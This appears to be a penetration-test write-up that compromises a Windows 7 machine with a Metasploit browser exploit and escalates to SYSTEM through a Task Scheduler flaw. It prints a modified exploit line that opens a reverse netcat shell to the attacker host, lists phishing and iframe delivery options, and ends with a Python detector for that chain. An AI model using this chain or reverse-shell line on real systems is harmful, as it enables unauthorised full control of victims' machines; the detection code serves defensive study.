Windows 7 – Client Side Attack and Local Privilege Escalation

A client-side exploit was prepared using the Metasploit framework. Exploit: http://www.exploit-db.com/exploits/16533/
The payload delivery technique depends on the attack scenario and the targeted user: a link sent by email, a redirect through Cross-Site Scripting, or hidden iframes injected into a compromised website are some of the viable options. When the target browses to 192.168.203.128:8080 the exploit runs; no other steps are necessary once someone visits the link.
A target is found, the exploit activates, and the VNC payload executes. A VNC window of the victim machine is now running on the attacker's machine. The whoami and systeminfo commands were used to gather information about the target. The machine appears to be running Windows 7 under a standard low-privileged user named test.
With the information gathered, ftp was used to upload two files: first, a Windows version of netcat (http://joncraton.org/blog/46/netcat-for-windows), and second, a local privilege escalation exploit that might allow a normal user to raise their privileges to those of an administrator.
The target machine is running a Windows version with a vulnerability that may allow an attacker to gain unauthorized privileges. The issue is caused by the Windows Task Scheduler failing to properly determine the security context of certain scheduled tasks. An exploit was identified and modified for the target machine: the added line of code creates a reverse (outbound) netcat connection, which bypasses local firewall rules that only block inbound connections. Exploit: http://www.exploit-db.com/exploits/15589/
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set a = fso.CreateTextFile(biatchFile, True)
    ' added line: the scheduled task's batch file starts a reverse netcat connection to the attacker listener
    a.WriteLine ("c:\users\test\ncc.exe 192.168.203.128 4444 -e c:\windows\system32\cmd.exe")
    ' the task removes itself after the batch file has run
    a.WriteLine ("schtasks /delete /f /TN wDw00t")
The exploit was executed on the victim with the command cscript.exe exploit.wsf. A listening server on the attacker machine caught the connection request made from the victim machine, resulting in a reverse shell on the victim. Because the connection was initiated by the privilege escalation exploit, the resulting shell has SYSTEM privileges, effectively allowing full control of the machine.
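As an added detection example (not part of the original write-up), the following Python scans constructed Sysmon-style process-creation records for the chain just described: a netcat-style reverse shell handing out cmd.exe, running as SYSTEM from a path under C:\Users, followed within a short window by a forced schtasks /delete of a named task. The record field names, host name and timestamps are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (Sysmon Event ID 1 style fields) modelled on the
# chain above: the task fires netcat as SYSTEM from the user's profile, then deletes itself.
SAMPLE_EVENTS = [
    {"ts": "2011-01-10 14:02:04", "host": "WIN7-TEST", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Users\test\ncc.exe",
     "cmdline": r"c:\users\test\ncc.exe 192.168.203.128 4444 -e c:\windows\system32\cmd.exe"},
    {"ts": "2011-01-10 14:02:05", "host": "WIN7-TEST", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\schtasks.exe", "cmdline": "schtasks /delete /f /TN wDw00t"},
    {"ts": "2011-01-10 15:30:00", "host": "WIN7-TEST", "user": "WIN7-TEST\\test",
     "image": r"C:\Windows\System32\schtasks.exe", "cmdline": "schtasks /query"},
]

# netcat-style "<ip> <port> ... -e <shell>" command line handing out cmd.exe
REVERSE_SHELL_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b.*\s-e\s+\S*cmd\.exe", re.I)
# forced deletion of a named task: the self-cleanup step of the exploit above
TASK_DELETE_RE = re.compile(r"schtasks(?:\.exe)?\s+/delete\s+/f\s+/tn\s+(\S+)", re.I)
USER_PROFILE_RE = re.compile(r"^c:\\users\\", re.I)
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"


def _ts(event):
    return datetime.strptime(event["ts"], "%Y-%m-%d %H:%M:%S")


def detect_reverse_shells(events, window=timedelta(seconds=60)):
    """One alert per reverse-shell launch, noting whether it ran as SYSTEM from a
    user-writable path and whether a scheduled task was deleted right after it."""
    alerts = []
    for ev in events:
        m = REVERSE_SHELL_RE.search(ev["cmdline"])
        if not m:
            continue
        alert = {
            "host": ev["host"], "ts": ev["ts"],
            "remote": (m.group(1), int(m.group(2))),
            # SYSTEM running a binary out of C:\Users\... is the escalation signature
            "elevated": ev["user"].upper() == SYSTEM_USER.upper()
                        and bool(USER_PROFILE_RE.match(ev["image"])),
            "task_deleted": None,
        }
        for other in events:
            d = TASK_DELETE_RE.search(other["cmdline"])
            if d and other["host"] == ev["host"] and abs(_ts(other) - _ts(ev)) <= window:
                alert["task_deleted"] = d.group(1)
        alerts.append(alert)
    return alerts
```

The ordinary schtasks /query record produces no alert, so only the correlated launch-then-cleanup pair is reported.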